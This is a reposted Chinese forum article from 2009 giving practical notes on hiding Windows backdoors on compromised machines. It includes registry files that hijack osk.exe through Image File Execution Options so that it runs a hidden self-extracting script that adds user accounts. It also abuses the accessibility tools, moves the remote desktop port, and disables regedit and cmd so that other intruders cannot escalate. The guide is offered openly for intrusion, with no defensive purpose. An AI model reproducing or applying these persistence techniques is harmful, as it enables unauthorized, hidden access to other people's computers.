安基网 首页 IT技术 电脑技术 查看内容

注册表及组策略后门实测手札

2009-1-7 09:23| 投稿: computer


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要:       实测后记录下。有兴趣的结合一下,也许能从中得到后门的放置技巧  安静导入regedit /s *.reg  方法一、取消粘滞键 REG导入...
      实测后记录下。有兴趣的结合一下,也许能从中得到后门的放置技巧  安静导入regedit /s *.reg  方法一、取消粘滞键 REG导入 sethc.reg  Windows Registry Editor Version 5.00  [HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys]  "Flags"="506"  [HKEY_USERS\.DEFAULT\Control Panel\Accessibility\StickyKeys]  "Flags"="506"  注册表导入后,注销后生效。也就是将原值510改为506  方法二、开始→控制面板→辅助功能选项-键盘-粘滞键-设置-取消勾选“使用快捷键”复选框  高对比度:左侧 ALT + 左侧 SHIFT + PRINT SCREEN。  鼠标键:左侧 ALT + 左侧 SHIFT + NUM LOCK  这两个仍可调用sethc.exe作后门使用了。我们总不能与其它人用一样的shift 5次吧,其实调用的都是同一个东西  C:\WINDOWS\system32\utilman.exe (辅助工具管理器)WIN+U 调用  C:\WINDOWS\system32\osk.exe (屏幕键盘)  C:\WINDOWS\system32\magnify.exe (放大镜) 注:这几个都是可利用的  映像方法  Windows Registry Editor Version 5.00  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe]  "debugger"="c:\WINDOWS\\System32\\wbem\ysjy.exe"  sethc.exe配合映像方法的使用效果更好  综合以上我们可以作出如下后门  将 VBS加用户的脚本(http://bbs.77169.com/mainframe.php?tid=225157&fid=161),制作成带密码的自解压ysjy.exe。  优点如下:  1、运行时VBS带参数后//B,防止重复加用户时,出现不必要的对话窗口。  2、注意使用后自动删除,自解压能实现。哈哈脚本加密必尽是可逆的  3、不管是他将sethc.exe替换成什么后门都不影响、自己的后门使用。哈哈我朋友就碰到过,怎么换都不行  4、可以在cmd禁用的条件下使用,防止他人使用cmd。  5、带个密码总是安全不少,且自己用rar工具破解自解压是不成功的。实测。  6、shift 5次不能调出,与众不同了。调用方法见上  下面的代码是,保护自己的成果。。其实自己很少保护自己的成果  3380远程端口修改 3380.reg  Windows Registry Editor Version 5.00  [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]  "PortNumber"=dword:00000d34  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]  "PortNumber"=dword:00000d34  有必要改一下远程的端口,有很多人还是喜欢入侵前。先看一下3389有无shift后门。  注册表禁用与恢复  禁用  Windows Registry Editor Version 5.00  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]  "DisableRegistryTools"=dword:00000001 //注册表恢复导入是行不通的。  恢复  gpedit.msc -用户配置-->管理模板-->系统 右面有个 -阻止访问注册表编辑工具-禁用  右键---新建--快捷方式----  在弹出的窗口“请键入项目的位置”输入栏里输入以下某例即可达到相干功能  %WinDir%\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t  REG_DWORD /d 0 /f (解注册表)  禁用注册表对肉鸡来说安全性提高不少,以上代码都是实测过的。网上的不见得行的通  禁用CMD  Windows Registry Editor Version 5.00  [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]  "DisableCMD"=dword:00000001 //00000000恢复  右键---新建--快捷方式----  在弹出的窗口“请键入项目的位置”输入栏里输入以下某例即可达到相干功能 其实不用注册表在rar里的附加参数就能修改注册表  %WinDir%\System32\reg.exe add HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 0 /f  禁用CMD对其它入侵者来说提权难度高了不少。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部